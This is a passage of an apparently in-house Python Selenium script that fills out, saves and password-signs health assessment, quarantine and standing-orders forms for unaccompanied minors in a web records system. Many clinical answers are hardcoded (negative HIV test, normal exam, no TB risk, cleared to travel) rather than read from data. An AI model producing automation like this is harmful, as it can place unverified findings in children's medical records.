driver.find_element(By.ID, 'linkCust_E_4a').clear()
driver.find_element(By.ID, 'linkCust_E_4a').send_keys("Denied.")
except:
sendRequest(targent_name, "Error: Unable to set E.4a", True)
pass
# E.5 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_5')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.5", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section F - Laboratory Testing")
# F.5 - HIV
try:
driver.find_element(By.ID, 'linkCust_F_5').click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5", True)
pass
t.sleep(1)
# F.5-a - > 13 yrs or sexual activity - Negative
try:
driver.find_element(By.ID, 'linkCust_F_5a').click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5a", True)
pass
# F.5-b -Test: Rapid Oral
try:
driver.find_elements(By.ID, 'linkCust_F_5b')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5b", True)
pass
print("Section G - TB Screening")
# G.1 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_1')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.1", True)
pass
# G.2 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.2", True)
pass
# G.3 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_3')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.3", True)
pass
# G.4 - b - IGRA (<2yrs)
try:
driver.find_elements(By.ID, 'linkCust_G_4')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.4", True)
pass
# G.4 - c - CXR (<15yrs)
try:
driver.find_elements(By.ID, 'linkCust_G_4')[2].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.4", True)
pass
print("Section H - Diagnosis and Plan")
# H.1 - b - Yes
try:
driver.find_elements(By.ID, 'linkCust_H_1')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.1", True)
pass
t.sleep(1)
# # H.13 - Medical Order
# try:
# driver.find_element(By.ID, 'linkCust_H_13').clear()
# driver.find_element(By.ID, 'linkCust_H_13').send_keys("Encounter for screening for other viral diseases")
# except:
# sendRequest(targent_name, "Error: Unable to set H.13", True)
# pass
# H.a - a - Return to clinic- PRN/As needed
try:
driver.find_elements(By.ID, 'linkCust_H_a')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.a", True)
pass
# H.b-a - Yes
try:
driver.find_elements(By.ID, 'linkCust_H_b')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.b", True)
pass
t.sleep(1)
# H.b1
try:
driver.find_element(By.ID, 'linkCust_H_b1').clear()
driver.find_element(By.ID, 'linkCust_H_b1').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.")
except:
sendRequest(targent_name, "Error: Unable to set H.b1", True)
pass
# H.c-a - No
try:
driver.find_elements(By.ID, 'linkCust_H_c')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.c", True)
pass
# H.d-a - No
try:
driver.find_elements(By.ID, 'linkCust_H_d')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.d", True)
pass
# H.f - Minor requires quarantine/ isolation, specify diagnosis and timeframe:
# try:
# driver.find_element(By.ID, 'linkCust_H_f').clear()
# driver.find_element(By.ID, 'linkCust_H_f').send_keys("Quarantine minor for 7 days from day of arrival.")
# except:
# pass
# H.g - Immunizations given/validated from foreign record
try:
driver.find_element(By.ID, 'linkCust_H_g').click()
except:
sendRequest(targent_name, "Error: Unable to click on H.g", True)
pass
# # H.i - Age- appropriate anticipatory guidance discussed and/or handout given
# try:
# driver.find_element(By.ID, 'linkCust_H_i').click()
# except:
# sendRequest(targent_name, "Error: Unable to click on H.i", True)
# pass
# H.p - Recommendations from Healthcare Provider/ Additional Information:
try:
driver.find_element(By.ID, 'linkCust_H_p').clear()
driver.find_element(By.ID, 'linkCust_H_p').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.\n\n Scribed by:")
except:
sendRequest(targent_name, "Error: Unable to set H.p", True)
pass
print("Click on button Save & Exit")
try:
driver.find_elements(By.ID, 'saveandexitbutton')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on button Save & Exit", True)
pass
t.sleep(3)
if clean_text(getData(data,'Quarantine Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
print("Quarantine/Isolation")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
pass
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
try:
# Select Assesment
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# Quarantine/Isolation
assessment.select_by_value('547095')
except:
sendRequest(targent_name, "Error: Unable to select Assesment", True)
pass
try:
# Click on "save" button - value="Save"
driver.find_element(By.XPATH, "//input[@value='Save']").click()
except:
sendRequest(targent_name, "Error: Unable to click on save", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - Demographics")
# A.1.
res = send_text(driver, "linkCust_A_1", name_designation)
if res:
sendRequest(targent_name, "Error: Unable to set A.1", True)
# A.1.a.
res = send_text(driver, "linkCust_A_1a_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set A.1.a", True)
# A.2.b.
res = send_click_pos(driver, "linkCust_A_2", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.b", True)
# A.3.e.
res = send_click_pos(driver, "linkCust_A_3", 4)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.e", True)
t.sleep(1)
# A.3.a.
res = send_text(driver, "linkCust_A_3a", "Contact with and (suspected) exposure to COVID-19")
if res:
sendRequest(targent_name, "Error: Unable to set A.3.a", True)
# B.6.d.
res = send_click_pos(driver, "linkCust_B_6", 3)
if res:
sendRequest(targent_name, "Error: Unable to set B.6.d", True)
t.sleep(1)
# B.6.a
res = send_text(driver, "linkCust_B_6a", "Quarantine minor for 7 days from day of arrival")
if res:
sendRequest(targent_name, "Error: Unable to set B.6.a", True)
# C.7.b.
res = send_click_pos(driver, "linkCust_C_7", 1)
if res:
sendRequest(targent_name, "Error: Unable to set C.7.b", True)
t.sleep(1)
# C.9.
res = send_click(driver, "linkCust_C_9")
if res:
sendRequest(targent_name, "Error: Unable to set C.9", True)
# C.9.a.
res = send_click(driver, "linkCust_C_9a")
if res:
sendRequest(targent_name, "Error: Unable to set C.9.a", True)
# C.9.b.
res = send_click(driver, "linkCust_C_9b")
if res:
sendRequest(targent_name, "Error: Unable to set C.9.b", True)
# Click Save & Sign & Lock & Exit
# send_click_pos(driver, "saveandexitbutton", 1)
# t.sleep(5)
res = send_click_pos(driver, "saveandsignbutton", 3)
if res:
sendRequest(targent_name, "Error: Unable to click saveandsignbutton", True)
t.sleep(5)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
t.sleep(1)
res = send_text_name(driver, "pw", password)
if res:
sendRequest(targent_name, "Error: Unable to set password", True)
res = send_click(driver, "saveButton")
if res:
sendRequest(targent_name, "Error: Unable to click saveButton", True)
print("Standing Orders Form Completed")
t.sleep(3)
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
if clean_text(getData(data,'Standing Orders Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
print("Standing Orders 12 and Over")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
pass
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
try:
# Select Assesment
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# Standing Orders 12 and Over
assessment.select_by_value('548012')
except:
sendRequest(targent_name, "Error: Unable to select Assesment", True)
pass
# Click on "save" button - value="Save"
driver.find_element(By.XPATH, "//input[@value='Save']").click()
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - Standing Orders 12yr and older")
# A.1.a.
res = send_click_pos(driver, "linkCust_A_1", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.a", True)
# A.1.b.
res = send_click_pos(driver, "linkCust_A_1", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.b", True)
# A.2.a.
res = send_click_pos(driver, "linkCust_A_2", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.a", True)
# A.2.b.
res = send_click_pos(driver, "linkCust_A_2", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.b", True)
# A.2.c.
res = send_click_pos(driver, "linkCust_A_2", 2)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.c", True)
# A.3.a.
res = send_click_pos(driver, "linkCust_A_3", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.a", True)
res = send_click_pos(driver, "linkCust_A_3", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.b", True)
# A.4.a.
res = send_click_pos(driver, "linkCust_A_4", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.4.a", True)
# A.5.a.
res = send_click_pos(driver, "linkCust_A_5", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.5.a", True)
# A.6.a.
res = send_click_pos(driver, "linkCust_A_6", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.6.a", True)
# A.7.a.
res = send_click_pos(driver, "linkCust_A_7", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.7.a", True)
res = send_click_pos(driver, "linkCust_A_7", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.7.b", True)
# A.8.a.
res = send_click_pos(driver, "linkCust_A_8", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.8.a", True)
res = send_click_pos(driver, "linkCust_A_8", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.8.b", True)
# A.9.a.
res = send_click_pos(driver, "linkCust_A_9", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.9.a", True)
# A.10.a.
res = send_click_pos(driver, "linkCust_A_10", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.10.a", True)
# A.11.a.
res = send_click_pos(driver, "linkCust_A_11", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.11.a", True)
# A.12.a.
res = send_click_pos(driver, "linkCust_A_12", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.12.a", True)
# A.13.a.
res = send_click_pos(driver, "linkCust_A_13", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.13.a", True)
# A.14.a.
res = send_click_pos(driver, "linkCust_A_14", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.14.a", True)
res = send_click_pos(driver, "linkCust_A_14", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.14.b", True)
# A.15.a.
res = send_click_pos(driver, "linkCust_A_15", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
# Click Save & Sign & Lock & Exit
# send_click_pos(driver, "saveandexitbutton", 1)
# t.sleep(5)
res = send_click_pos(driver, "saveandsignbutton", 3)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
t.sleep(5)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to set A.15.a", True)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = send_text_name(driver, "pw", password)
if res:
sendRequest(targent_name, "Error: Unable to set password", True)
send_click(driver, "saveButton")
print("Standing Orders Form Completed")
t.sleep(3)
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
if clean_text(getData(data,'Assessment')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
print("*Health Assessment Form Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 2")
# Click on "Assmnts"
try:
assessment = driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
t.sleep(10)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
try:
# Click on "New" button
newwww = driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
# Click on "save" button - value="Save"
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
try:
saveeee = driver.find_element(By.XPATH, '/html/body/form/div[2]/input[1]')
ActionChains(driver).move_to_element(saveeee).click(saveeee).perform()
except:
sendRequest(targent_name, "Error: Unable to click on save", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Return to main window
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to switch window", True)
t.sleep(1)
# A.General Information - a.Name and Designation
res = send_text(driver, 'linkCust_A_1_1', name_designation)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.1", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
res = send_text(driver, 'linkCust_A_1_2', str(getData(data,'telephone')))
if res:
sendRequest(targent_name, "Error: Unable to set A.1.2", True)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
res = send_text(driver, 'linkCust_A_2', md_do_pa_np)
if res:
sendRequest(targent_name, "Error: Unable to set A.2", True)
res = send_text(driver, 'linkCust_A_3', getData(data,'clinicname') or clinic_or_practice)
if res:
sendRequest(targent_name, "Error: Unable to set A.3", True)
res = send_text(driver, 'linkCust_A_4', getData(data,'Healthcare Provider Street address, City or Town, State'))
if res:
sendRequest(targent_name, "Error: Unable to set A.4", True)
# send_text(driver, 'linkCust_A_5_dummy', data['Date of visit'])
res = send_text(driver, "linkCust_A_5_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set A.5", True)
# send_text(driver, 'linkCust_A_7', data['Program Name'])
# send_text(driver, 'Cust_B_1', temp_c)
# send_text(driver, 'linkCust_B_1a', hr)
# send_text(driver, 'linkCust_B_1b', bp)
# send_text(driver, 'linkCust_B_1c', rr)
# send_text(driver, 'linkCust_B_1d', ht)
# send_text(driver, 'linkCust_B_1e', wt)
#B.1a. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1a\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1a", True)
# pass
# #B.1b. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1b\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1b", True)
# pass
# #B.1c. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1c\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1c", True)
# pass
# #B.1d. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1d\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1d", True)
# pass
# #B.1e. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1e\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1e", True)
# pass
# #B.1f. Clear Data
# try:
# driver.find_element(By.XPATH, '//a[@href="javascript:clearPPControl(\'linkCust_B_1f\');"]').click();
# except:
# sendRequest(targent_name, "Error: Unable to click on B.1f", True)
# pass
# B. History and Physical - Allergies
if no_allergies == 'Yes':
res = send_click_pos(driver, 'linkCust_B_2', 0)
if res:
sendRequest(targent_name, "Error: Unable to click on B.2", True)
if food == 'Yes':
res = send_click_pos(driver, 'linkCust_D_2', 1)
if res:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
if medication == 'Yes':
res = send_click_pos(driver, 'linkCust_D_2', 2)
if res:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
# B: History and Physical - 3. Concerns expressed by child or caregiver?
# Click Yes
# linkCust_B_3
try:
b_3 = driver.find_elements(By.ID, 'linkCust_B_3')
ActionChains(driver).move_to_element(b_3[1]).click(b_3[1]).perform()
except:
sendRequest(targent_name, "Error: Unable to click on B.3", True)
pass
res = send_text(driver, 'linkCust_B_3a', corrected_left_eye)
if res:
sendRequest(targent_name, "Error: Unable to set B.3a", True)
# res = send_text(driver, 'linkCust_B_3b', corrected_both_eyes)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.3b", True)
# res = send_text(driver, 'linkCust_B_4', uncorrected_right_eye)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.4", True)
# res = send_text(driver, 'linkCust_B_4b', uncorrected_both_eyes)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.4b", True)
# res = send_text(driver, 'linkCust_B_5', medical_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.5", True)
# res = send_text(driver, 'linkCust_B_6', travel_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.6", True)
# res = send_text(driver, 'linkCust_B_7', past_medical_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.7", True)
# res = send_text(driver, 'linkCust_B_8', family_history)
# if res:
# sendRequest(targent_name, "Error: Unable to set B.8", True)
# res = send_text(driver, 'linkCust_B_9', str(lmp))
# if res:
# sendRequest(targent_name, "Error: Unable to set B.9", True)
# res = send_text(driver, 'linkCust_B_9a', str(previous_regnancy))
# if res:
# sendRequest(targent_name, "Error: Unable to set B.9a", True)
res = send_text(driver, 'linkCust_C_21', other_1)
if res:
sendRequest(targent_name, "Error: Unable to set C.21", True)
res = send_text(driver, 'linkCust_C_22', other_2)
if res:
sendRequest(targent_name, "Error: Unable to set C.22", True)
if no_abnormal_findings == 'Yes':
res = send_click(driver, 'linkCust_C_1')
if res:
sendRequest(targent_name, "Error: Unable to click on C.1", True)
# Physical Examination D
res = send_click_pos(driver, 'linkCust_D_1', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.1.a", True)
res = send_click_pos(driver, 'linkCust_D_2', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.2.a", True)
res = send_click_pos(driver, 'linkCust_D_3', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.3.a", True)
res = send_click_pos(driver, 'linkCust_D_4', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.4.a", True)
res = send_click_pos(driver, 'linkCust_D_5', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.5.a", True)
res = send_click_pos(driver, 'linkCust_D_6', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.6.a", True)
res = send_click_pos(driver, 'linkCust_D_8', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.8.a", True)
res = send_click_pos(driver, 'linkCust_D_9', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.9.a", True)
res = send_click_pos(driver, 'linkCust_D_10', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.10.a", True)
res = send_click_pos(driver, 'linkCust_D_11', 0)
if res:
sendRequest(targent_name, "Error: Unable to set D.11.a", True)
# if general_appearance.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_1', 0)
# else:
# send_click_pos(driver, 'linkCust_D_1', 1)
# if heent.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_2', 0)
# else:
# send_click_pos(driver, 'linkCust_D_2', 1)
# if neck.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_3', 0)
# else:
# send_click_pos(driver, 'linkCust_D_3', 1)
# if heart.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_4', 0)
# else:
# send_click_pos(driver, 'linkCust_D_4', 1)
# if lungs.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_5', 0)
# else:
# send_click_pos(driver, 'linkCust_D_5', 1)
# if abdomen.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_6', 0)
# else:
# send_click_pos(driver, 'linkCust_D_6', 1)
# try:
# d7a=driver.find_element_by_id('linkCust_D_7a')
# ActionChains(driver).move_to_element( d7a).click( d7a).send_keys(describe).perform()
# except:
# pass
# if extremeties.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_8', 0)
# else:
# send_click_pos(driver, 'linkCust_D_8', 1)
# if back_spine.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_9', 0)
# else:
# send_click_pos(driver, 'linkCust_D_9', 1)
# if neurologic.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_10', 0)
# else:
# send_click_pos(driver, 'linkCust_D_10', 1)
# if skin.lower() == 'normal':
# send_click_pos(driver, 'linkCust_D_11', 0)
# else:
# send_click_pos(driver, 'linkCust_D_11', 1)
# try:
# driver.find_element(By.ID, 'linkCust_D_12').clear()
# driver.find_element(By.ID, 'linkCust_D_12').send_keys("Whisper test passed")
# except:
# pass
# asdddddd= driver.find_element_by_xpath('/html/body/table[5]/tbody/tr[2]/td/table/tbody/tr[5]/td/form/table/tbody/tr[2]/td/table/tbody/tr[5]/td[3]/table/tbody/tr[3]/td/table/tbody/tr[4]/td[2]')
# try:
# buttonnn= asdddddd.find_elements_by_tag_name('input')
# ActionChains(driver).move_to_element(buttonnn[int(mental_health)]).click(buttonnn[int(mental_health)]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click mental_health", True)
# pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# # Hidden checkbox
# res = send_click_pos(driver, 'linkCust_F_2', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click F.2", True)
# # Hidden checkbox
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_F_2b', 1)
# if res:
# sendRequest(targent_name, "Error: Unable to click F.2b", True)
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_G_1', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.1", True)
# t.sleep(1)
# res = send_click_pos(driver, 'linkCust_G_2', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.2", True)
# res = send_click_pos(driver, 'linkCust_G_3', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.3", True)
# res = send_click_pos(driver, 'linkCust_G_4', 1)
# if res:
# sendRequest(targent_name, "Error: Unable to click G.4", True)
# # Not found
# res = send_click_pos(driver, 'linkCust_H_1', 0)
# if res:
# sendRequest(targent_name, "Error: Unable to click H.1", True)
# #linkCust_H_13
# try:
# # Not found
# b1e=driver.find_elements_by_id('linkCust_H_13')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).send_keys(other_medical).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click other_medical", True)
# pass
# try:
# # t.sleep(5)
# # Not found
# b1e=driver.find_elements_by_id('linkCust_H_14')
# #ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_14", True)
# pass
# try:
# # t.sleep(5)
# # Not found
# b1e=driver.find_elements_by_id('linkCust_H_15')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).perform()
# ActionChains(driver).move_to_element(b1e[5]).click(b1e[5]).perform()
# ActionChains(driver).move_to_element(b1e[7]).click(b1e[7]).perform()
# ActionChains(driver).move_to_element(b1e[10]).click(b1e[10]).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_15", True)
# pass
# try:
# # Not found
# b1e=driver.find_elements_by_id('linkCust_H_15e')
# ActionChains(driver).move_to_element(b1e[0]).click(b1e[0]).send_keys(h15).perform()
# except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_15e", True)
# pass
# AW: Describe concerns
# try:
# # Hidden
# e1a=driver.find_element_by_id('linkCust_E_1a')
# ActionChains(driver).move_to_element( e1a).click( e1a).send_keys(describe_concerns).perform()
# except:
# pass
try:
# Not found
h16 = driver.find_element(By.ID, 'linkCust_H_16')
ActionChains(driver).move_to_element(h16).click(h16).send_keys(getData(data,'Additional Information')).perform()
except:
# sendRequest(targent_name, "Error: Unable to click linkCust_H_16", True)
pass
# Not found
send_click_pos(driver, 'linkCust_I_1', 1)
# Not found
send_click_pos(driver, 'linkCust_I_2', 2)
# Not found
send_click_pos(driver, 'linkCust_I_3', 1)
# Not found
send_click_pos(driver, 'linkCust_I_4', 0)
# Not found
send_click_pos(driver, 'linkCust_J_1', 0)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# F. Diagnosis and Plan - Diagnosis
# ID: linkCust_F_1f
# Name: Cust_F_1
# Click in Yes
res = send_click_pos(driver, 'linkCust_F_1', 1)
if res:
sendRequest(targent_name, "Error: Unable to click F.1", True)
# F. Diagnosis and Plan - Plan - a. Return to clinic:
# linkCust_F_a
# Click in No
res = send_click_pos(driver, 'linkCust_F_a', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.a", True)
# F. Diagnosis and Plan - Plan - b. Minor fit to travel?
# linkCust_F_b
# Click on Yes
res = send_click_pos(driver, 'linkCust_F_b', 1)
if res:
sendRequest(targent_name, "Error: Unable to click F.b", True)
t.sleep(1)
# F. Diagnosis and Plan - Plan - b1. Specify travel:
try:
driver.find_element(By.ID, 'linkCust_F_b1').clear()
driver.find_element(By.ID, 'linkCust_F_b1').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.")
except:
sendRequest(targent_name, "Error: Unable to click F.b1", True)
pass
# F. Diagnosis and Plan - Plan - c.Per program staff, discharge from ORR custody will be delayed?
# linkCust_F_c
# Click in No
res = send_click_pos(driver, 'linkCust_F_c', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.c", True)
# F. Diagnosis and Plan - Plan - d.Minor has/May have an ADA disability?
# linkCust_F_d
# Click in No
res = send_click_pos(driver, 'linkCust_F_d', 0)
if res:
sendRequest(targent_name, "Error: Unable to click F.d", True)
# F. Diagnosis and Plan - Plan - i.Age- appropriate anticipatory guidance discussed and/or handout given
# linkCust_F_i
# Clickbox
# send_click_pos(driver, 'linkCust_F_i', 0)
status_string = "Click button Save & Sign"
print(status_string)
# Click button Save & Sign
try:
save_sign_button = driver.find_element(By.XPATH, '/html/body/table[5]/tbody/tr[2]/td/table/tbody/tr[8]/td/input[3]')
ActionChains(driver).move_to_element(save_sign_button).click(save_sign_button).perform()
except:
sendRequest(targent_name, "Error: Unable to click Save & Sign", True)
pass
t.sleep(3)
## END - USER EDIT
break
t.sleep(1)
select_window(driver, 0)
print("END - USER EDIT")
## END - USER EDIT
break
else:
print("User not found")
# Click on search input field
try:
search_select=driver.find_element(By.ID, 'searchSelect')
ActionChains(driver).move_to_element(search_select).click(search_select).perform()
except:
pass
t.sleep(2)
try:
driver.find_element(By.XPATH, '//td[contains(text(),"All Facilities")]').click()
except:
pass
# Click on search input field
# Send Excel name
res = send_text(driver, 'searchField', target_user_id)
if res:
sendRequest(targent_name, "Error: Unable to click searchField", True)
res = send_enter(driver, 'searchField')
if res:
sendRequest(targent_name, "Error: Unable to click searchField", True)
# Stop If Stop Button is pressed
if thread_stopped:
break
# Select pop-up window "Global Resident Search -- All Residents"
t.sleep(5)
print(driver.window_handles)
try:
driver.switch_to.window(driver.window_handles[-1])
print("Select pop-up windo - Global Resident Search")
except:
pass
try:
driver.switch_to_window(driver.window_handles[-1])
print("Select pop-up windo - Global Resident Search2")
except:
pass
try:
driver.find_element(By.XPATH, '//a[contains(text(),"Current")]').click()
print("Click Current tab")
except:
pass
try:
driver.find_element(By.XPATH, "//a[@href='/admin/client/clientlist.jsp?ESOLview=Current&ESOLglobalclientsearch=Y']").click();
print("Click Current tab2")
except:
pass
try:
driver.find_element(By.LINK_TEXT, "Current").click()
print("Click Current tab3")
except:
pass
